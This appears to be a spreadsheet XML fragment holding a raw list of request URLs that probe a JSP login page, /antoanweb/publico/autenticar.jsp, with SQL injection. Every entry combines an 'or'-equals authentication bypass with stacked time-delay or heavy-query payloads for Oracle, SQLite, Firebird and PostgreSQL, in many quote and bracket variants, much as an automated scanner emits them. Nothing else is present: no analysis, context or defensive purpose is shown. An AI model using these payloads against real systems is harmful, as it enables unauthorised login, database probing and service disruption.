    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and(("wydy"like"wydy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and((("lobi"like"lobi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and"gurq"like"gurq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and(4056=4056</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and((6034=6034</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and(((8515=8515</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and('crsx'='crsx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and(('taks'='taks</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and((('wqkd'='wqkd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and'xjut'='xjut</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and('unak'like'unak</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and(('bbbw'like'bbbw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and((('cvts'like'cvts</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and'zpql'like'zpql</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and("mihx"="mihx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and(("vgcb"="vgcb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and((("lmxb"="lmxb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and"tymb"="tymb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and("xfwh"like"xfwh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and(("qmze"like"qmze</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and((("muxn"like"muxn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5;--and"ujhr"like"ujhr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);begindbms_lock.sleep(5);end;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');begindbms_lock.sleep(5);end;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';begindbms_lock.sleep(5);end;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";begindbms_lock.sleep(5);end;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);begindbms_lock.sleep(5);end;--and(8547=8547</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));begindbms_lock.sleep(5);end;--and((1788=1788</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));begindbms_lock.sleep(5);end;--and(((1335=1335</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;begindbms_lock.sleep(5);end;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');begindbms_lock.sleep(5);end;--and('skvu'='skvu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));begindbms_lock.sleep(5);end;--and(('fuqj'='fuqj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));begindbms_lock.sleep(5);end;--and((('zybu'='zybu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';begindbms_lock.sleep(5);end;--and'qbis'='qbis</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');begindbms_lock.sleep(5);end;--and('sevn'like'sevn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));begindbms_lock.sleep(5);end;--and(('ipbs'like'ipbs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));begindbms_lock.sleep(5);end;--and((('pjez'like'pjez</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';begindbms_lock.sleep(5);end;--and'kllf'like'kllf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");begindbms_lock.sleep(5);end;--and("ajon"="ajon</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));begindbms_lock.sleep(5);end;--and(("yjvk"="yjvk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));begindbms_lock.sleep(5);end;--and((("wjdq"="wjdq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";begindbms_lock.sleep(5);end;--and"hxjr"="hxjr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");begindbms_lock.sleep(5);end;--and("ubxv"like"ubxv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));begindbms_lock.sleep(5);end;--and(("qtxn"like"qtxn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));begindbms_lock.sleep(5);end;--and((("biqh"like"biqh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";begindbms_lock.sleep(5);end;--and"qcfc"like"qcfc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);beginuser_lock.sleep(5);end;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');beginuser_lock.sleep(5);end;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';beginuser_lock.sleep(5);end;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";beginuser_lock.sleep(5);end;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);beginuser_lock.sleep(5);end;--and(9393=9393</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));beginuser_lock.sleep(5);end;--and((2964=2964</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));beginuser_lock.sleep(5);end;--and(((5472=5472</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;beginuser_lock.sleep(5);end;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');beginuser_lock.sleep(5);end;--and('ljyu'='ljyu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));beginuser_lock.sleep(5);end;--and(('fzfk'='fzfk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));beginuser_lock.sleep(5);end;--and((('zvqy'='zvqy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';beginuser_lock.sleep(5);end;--and'jiik'='jiik</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');beginuser_lock.sleep(5);end;--and('wtab'like'wtab</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));beginuser_lock.sleep(5);end;--and(('dxep'like'dxep</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));beginuser_lock.sleep(5);end;--and((('ygnk'like'ygnk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';beginuser_lock.sleep(5);end;--and'htyz'like'htyz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");beginuser_lock.sleep(5);end;--and("baqf"="baqf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));beginuser_lock.sleep(5);end;--and(("otps"="otps</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));beginuser_lock.sleep(5);end;--and((("vdvi"="vdvi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";beginuser_lock.sleep(5);end;--and"jjbq"="jjbq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");beginuser_lock.sleep(5);end;--and("eyuu"like"eyuu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));beginuser_lock.sleep(5);end;--and(("kmul"like"kmul</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));beginuser_lock.sleep(5);end;--and((("rqsb"like"rqsb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";beginuser_lock.sleep(5);end;--and"hrmk"like"hrmk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and(1123=1123</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and((1925=1925</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and(((3522=3522</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and('qazm'='qazm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and(('ngup'='ngup</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and((('bppr'='bppr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and'ngij'='ngij</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and('mums'like'mums</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and(('afes'like'afes</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and((('bovm'like'bovm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and'rlga'like'rlga</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and("oiox"="oiox</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and(("scvc"="scvc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and((("ijqc"="ijqc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and"sbmu"="sbmu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and("nssj"like"nssj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and(("symk"like"symk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and((("qpmu"like"qpmu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectlike(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))));--and"vejb"like"vejb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and(1315=1315</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and((5098=5098</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and(((8663=8663</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and('fcwf'='fcwf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and(('jlts'='jlts</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and((('wrpy'='wrpy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and'avny'='avny</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and('cqlx'like'cqlx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and(('xepm'like'xepm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and((('pzyd'like'pzyd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and'ocgm'like'ocgm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and("mcgp"="mcgp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and(("cfjo"="cfjo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and((("cfhe"="cfhe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and"apno"="apno</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and("hyyh"like"hyyh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and(("yuff"like"yuff</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and((("vtjo"like"vtjo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3;--and"oagq"like"oagq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and5665=(select5665frompg_sleep(5))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5665=(select5665frompg_sleep(5))</t>
